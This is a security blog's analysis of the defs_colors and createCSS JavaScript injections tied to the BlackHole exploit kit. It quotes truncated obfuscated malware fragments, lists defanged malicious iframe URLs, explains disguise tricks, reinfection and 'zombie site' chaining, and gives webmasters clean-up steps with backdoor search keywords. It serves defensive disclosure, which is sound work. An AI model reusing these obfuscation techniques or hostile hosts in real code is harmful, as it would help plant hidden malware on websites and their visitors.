BlackHole: defs_colors and createCSS Injections

This is a review of the malware injection attack that I see quite often lately.

On Safe Browsing diagnostic pages, infected sites usually mention the following domains:

Malicious software is hosted on 4 domain(s), including new-solomon .cz.cc/, newsalamandra .cz.cc/, banpox .cz.cc/.

2 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including chadon .nl/, 75.127.108 .0/.

In intermediaries, they usually include chadon .nl, corkit .co, tongho.co.th and some IP address.

On infected sites, I found various modification of a script that generally looks like this:

if (typeof(defs_colors)=="undefined") {
var defs_colors = 1;
var div_colors = new Array('#778383', '#7f493e', '#3e7277', '#70737e', '#7d3d7d',...);
var css_colors = new Array('#717e73', '#887378', '#857378', '#827f7b', '#70887d',...);
var css_indexes = new Array(4, 3, 7, 4, 6, 39, 17, 3, 4);
function div_pick_colors(t) {
...skipped...
}
check_div_styles();
}

Depending on the script revision, it injects a hidden iframe that loads malicious content from the following URLs:

hxxp://chadon .nl/ozitude/catalog/?catalogrssnews=1
hxxp://85 .128 .169 .137/webim/jquery.min.html

Locations

Usually all .html files are infected.

This scripts can be found in many different places:

• injected at the top or at the the bottom of HTML code of a web page
• injected at the bottom of legitimate .js files
• sometimes hackers create new .js files with seemingly legitimate names like jquery.js, jquery.dropdown.js, jquery_002.js, etc and inject links to those .js files into HTML code of web pages. Note, these rogue .js files can be created in several different directories and different web pages will link to different files.

Reinfections

It is not enough to remove the malicious code from legitimate files. Websites that don’t close the security hole are usually reinfected within a day or so.

Not only do hackers reinfect compromised sites but they also regularly update injected malicious code (probably to make detection more difficult).

createCSS

On one of the infected sites, I found a different type of a malicious script along with the familiar defs_colors code.

function createCSS(selector,declaration){var ua=navigator.userAgent.toLowerCase();...skipped...kgl=new Date(2010,11,3,2,21,4);t=kgl.getSeconds();var dkel=[420/t,408/t,160/t,400/t,444/t,396/t,468/t,436/t,...skipped...,408/t,164/t,236/t,500/t|;var aty="";var g=function(){return this;}();ko=g["e"+iu+"l"];...skipped...}setTimeout(function(){ko(ydxx);},500);

This script created a hidden iframe with the same source as the defs_colors code on the same page: hxxp://85 .128 .169 .137/webim/jquery.min.html – so both scripts belong to the same attack.

Some more iframe URLs used by the createCSS the script:

• bonuses.corkit .co/ywdngzevkw.php?n=f0203
• blog.1dollarclick .mobi/news/2007/
• porea.1poundclick .co.uk/news/2010

What else those defs_colors and createCSS have in common is the way they pretend to be legitimate scripts.

• They use quite benign function and variable names, e.g. createCSS, div_pick_colors, check_div_styles, style_node, css_indexes, etc.
• They make the encoded part of the script less prominent
  • in case of createCSS, the encoded part starts way off the screen (after around 1,000 characters of a less suspicious code)
  • in case of defs_colors, the encoded part is presented under the disguise of an array of colors and the decoder looks like a color manipulation function. I must admit, this looks quite benign and when I saw it for the first time, I didn’t even recognized this code as malicious!

Both revisions of the code have similar injection locations. However, for the createCSS (probably as a more old type) I noticed a few more interesting locations and injection patterns.

Sometimes hackers inject an external script that points to either a .js or a .php file on a different site. Sometimes both types of external scripts are injected into the same page:

<scriрt type="text/javascript" src="http://ba██████████████.pl/search.php"></scriрt>
<scriрt type="text/javascript" src="http://on████████████.com.au/swfobject.js"></scriрt>

Zombie sites

Note, the masked domain names belong to legitimate websites where hackers created those search.php and swfobject.js files that only consist of that createCSS malicious code. Moreover, those legitimate websites may in turn be infected with links to similar external scripts on other compromised legitimate sites. This scheme resembles Gumblar that also injected links to malicious scripts (with .php extension) on other hacked site. Each site could both have infected web pages and at the same time contain files that infect unrelated third-party sites (act a a zombie site).

Infection vector(s)

As we know, Gumblar used stolen FTP credentials to break into legitimate websites and infect them. This time this vector is also confirmed by hosting providers who can see traces of the injections in FTP logs of compromised sites. However, stolen passwords seem to be not the only exploited security hole, on certain sites the same scripts are reported to be injected using vulnerabilities in web applications. Well, it’s 2011 and hacker attacks become more and more versatile.

BlackHole exploit kit

This createCSS code is familiar to a security community for quite some time. I read about it on Symantec’s blog where they identified it as being injected by criminals who used the BlackHole exploit kit. According to Symantec, it was (and probably still is) the most prevalent exploit toolkit in the wild and was spreading like a wildfire.

To webmasters

Based on the information I currently have about this attack, here my recommendations to webmasters of affected sites:

1. Thoroughly scan your computers for malware.
2. Change all site passwords.
3. Don’t save passwords in FTP clients. Malicious programs know how to extract your passwords from configuration files of most popular FTP clients.
4. If your hosting supports SFTP, stop using FTP — it’s insecure. (New reality, not only malware on your computer can sniff passwords in plain-text FTP traffic but also (with proper tools) people from other computers on the same Wi-Fi network can do it.) Switch to SFTP as soon as possible. All decent FTP clients support SFTP mode so the switch will be painless for you. Do it!
5. If you use third party software on your site, make sure it is up to date and fully patched.
6. Scan your whole server (your account) for suspicious files. There may be backdoors files there. Here are some keywords to search for: “base64_decode“, “edoced_46esab“, “gzinflate“, “gzuncompress” , “eval(base64_decode“, “eval(stripslashes“, “FilesMan“.
7. If your site is blacklisted by Google, request a malware review via Google Webmaster Tools (Diagnostics -> Malware) once you’ve finished the clean up.

Update. There is some new information on this attack that includes injected PHP code, osCommerce vulnerability and backdoor files

###

If this BlackHole toolkit is really so popular this sort of hacks will not go away soon. The attack will only evolve. So let’s gather more information about it and help each other. Tell us your success story if you managed to completely clean up your site, or a disaster story if the malware keeps on returning driving you mad. Maybe you have some evidences, such as FTP logs or backdoor scripts found on your server. Maybe you know how exactly hackers steal site passwords. Any information is welcome!

Related posts:

• 10 FTP Clients Malware Steals Credentials From
• Revenge of Gumblar Zombies
• Versatile .CC Attacks
• Introduction to Website Parasites